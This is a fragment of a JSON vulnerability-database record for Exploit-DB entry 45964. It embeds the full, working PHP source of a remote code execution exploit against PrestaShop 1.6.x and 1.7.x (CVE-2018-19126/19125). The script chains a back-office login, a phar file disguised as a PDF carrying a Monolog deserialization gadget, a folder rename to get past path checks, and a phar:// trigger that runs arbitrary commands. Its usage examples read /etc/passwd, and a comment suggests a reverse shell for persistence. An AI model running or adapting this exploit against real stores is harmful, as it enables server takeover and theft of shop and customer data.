"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19125", "CVE-2018-19126", "2018-19126", "2018-19125"], "modified": "2018-12-11T00:00:00", "id": "EDB-ID:45964", "href": "https://www.exploit-db.com/exploits/45964", "sourceData": "<?php\r\n/**\r\n * \r\n * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution\r\n * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.\r\n * 
\r\n * Chaining multiple vulnerabilities to trigger deserialization via phar.\r\n *\r\n * Date:\r\n * December 1st, 2018\r\n *\r\n * Author:\r\n * farisv\r\n *\r\n * Vendor Homepage:\r\n * https://www.prestashop.com/\r\n *\r\n * Vulnerable Package Link:\r\n * https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\r\n *\r\n * CVE :\r\n * - CVE-2018-19126\r\n * - CVE-2018-19125\r\n * \r\n * Prerequisite:\r\n * - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\r\n * - Back Office account (logistician, translator, salesman, etc.).\r\n * \r\n * Usage:\r\n * php exploit.php back-office-url email password func param\r\n * \r\n * Example:\r\n * php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123\r\n * system 'cat /etc/passwd'\r\n * \r\n * Note:\r\n * Note that the upload directory will be renamed and you can't upload the\r\n * malicious phar file again if the folder name is not reverted. You might want\r\n * to execute reverse shell to gain persistence RCE or include the command to\r\n * rename the folder again in your payload (you need to know the path to the\r\n * upload directory).\r\n * \r\n * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.\r\n * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\r\n * \r\n */\r\n\r\nnamespace PrestaShopRCE {\r\n\r\n class Exploit {\r\n private $url;\r\n private $email;\r\n private $passwd;\r\n private $cmd;\r\n private $func;\r\n private $param;\r\n\r\n public function __construct($url, $email, $passwd, $func, $param) {\r\n $this->url = $url;\r\n $this->email = $email;\r\n $this->passwd = $passwd;\r\n $this->func = $func;\r\n $this->param = $param;\r\n }\r\n\r\n private function post($path, $data, $cookie) {\r\n $curl_handle = curl_init();\r\n \r\n $options = array(\r\n CURLOPT_URL => $this->url . 
$path,\r\n CURLOPT_HEADER => true,\r\n CURLOPT_POST => 1,\r\n CURLOPT_POSTFIELDS => $data,\r\n CURLOPT_RETURNTRANSFER => true,\r\n CURLOPT_COOKIE => $cookie\r\n );\r\n \r\n curl_setopt_array($curl_handle, $options);\r\n $raw = curl_exec($curl_handle);\r\n curl_close($curl_handle);\r\n\r\n return $raw;\r\n }\r\n\r\n private function fetch_cookie($raw) {\r\n $header = \"Set-Cookie: \";\r\n $cookie_header_start = strpos($raw, $header);\r\n $sliced_part = substr($raw, $cookie_header_start + strlen($header));\r\n $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));\r\n return $cookie;\r\n }\r\n\r\n public function run() {\r\n\r\n // Login and get PrestaShop cookie\r\n $data = array(\r\n 'email' => $this->email,\r\n 'passwd' => $this->passwd,\r\n 'submitLogin' => '1',\r\n 'controller' => 'AdminLogin',\r\n 'ajax' => '1'\r\n );\r\n $cookie = \"\";\r\n $raw = $this->post('/', $data, $cookie);\r\n $prestashop_cookie = $this->fetch_cookie($raw);\r\n\r\n // Get FileManager cookie\r\n $data = array();\r\n $cookie = $prestashop_cookie;\r\n $raw = $this->post('/filemanager/dialog.php', $data, $cookie);\r\n $filemanager_cookie = $this->fetch_cookie($raw);\r\n\r\n // Craft deserialization gadget\r\n $gadget = new \\Monolog\\Handler\\SyslogUdpHandler(\r\n new \\Monolog\\Handler\\BufferHandler(\r\n ['current', $this->func],\r\n [$this->param, 'level' => null]\r\n )\r\n );\r\n\r\n // Craft malicious phar file\r\n $phar = new \\Phar('phar.phar');\r\n $phar->startBuffering();\r\n $phar->addFromString('test', 'test');\r\n $phar->setStub('<?php __HALT_COMPILER(); ? 
>');\r\n $phar->setMetadata($gadget);\r\n $phar->stopBuffering();\r\n\r\n // Change the extension\r\n rename('phar.phar', 'phar.pdf');\r\n\r\n // Cookie for next requests\r\n $cookie = \"$prestashop_cookie; $filemanager_cookie\";\r\n\r\n // Upload phar.pdf\r\n $curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');\r\n $data = array(\r\n 'file' => $curl_file\r\n );\r\n $raw = $this->post('/filemanager/upload.php', $data, $cookie);\r\n\r\n // Rename image directory to bypass realpath() check\r\n $data = array(\r\n 'name' => 'renamed'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/execute.php?action=rename_folder',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Trigger deserialization\r\n // The '/img/cms/' substring is important to bypass string check\r\n $data = array(\r\n 'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/ajax_calls.php?action=image_size',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Display the raw result\r\n print $raw;\r\n\r\n }\r\n }\r\n\r\n}\r\n\r\n/*\r\n * Based on\r\n * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/\r\n*/\r\nnamespace Monolog\\Handler {\r\n\r\n class SyslogUdpHandler {\r\n protected $socket;\r\n\r\n function __construct($param) {\r\n $this->socket = $param;\r\n }\r\n }\r\n\r\n class BufferHandler {\r\n protected $handler;\r\n protected $bufferSize = -1;\r\n protected $buffer;\r\n protected $level = null;\r\n protected $initialized = true;\r\n protected $bufferLimit = -1;\r\n protected $processors;\r\n\r\n function __construct($methods, $command) {\r\n $this->processors = $methods;\r\n $this->buffer = [$command];\r\n $this->handler = clone $this;\r\n }\r\n }\r\n\r\n}\r\n\r\nnamespace {\r\n\r\n if (count($argv) != 6) {\r\n $hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\";\r\n $hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \";\r\n $hint .= \"salesman@shop.com 54l35m4n123 system 'uname 
-a'\";\r\n die($hint);\r\n }\r\n\r\n if (!extension_loaded('curl')) {\r\n die('Need php-curl');\r\n }\r\n\r\n $url = $argv[1];\r\n $email = $argv[2];\r\n $passwd = $argv[3];\r\n $func = $argv[4];\r\n $param = $argv[5];\r\n\r\n $exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param);\r\n $exploit->run();\r\n\r\n}", "sourceHref": "https://www.exploit-db.com/download/45964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}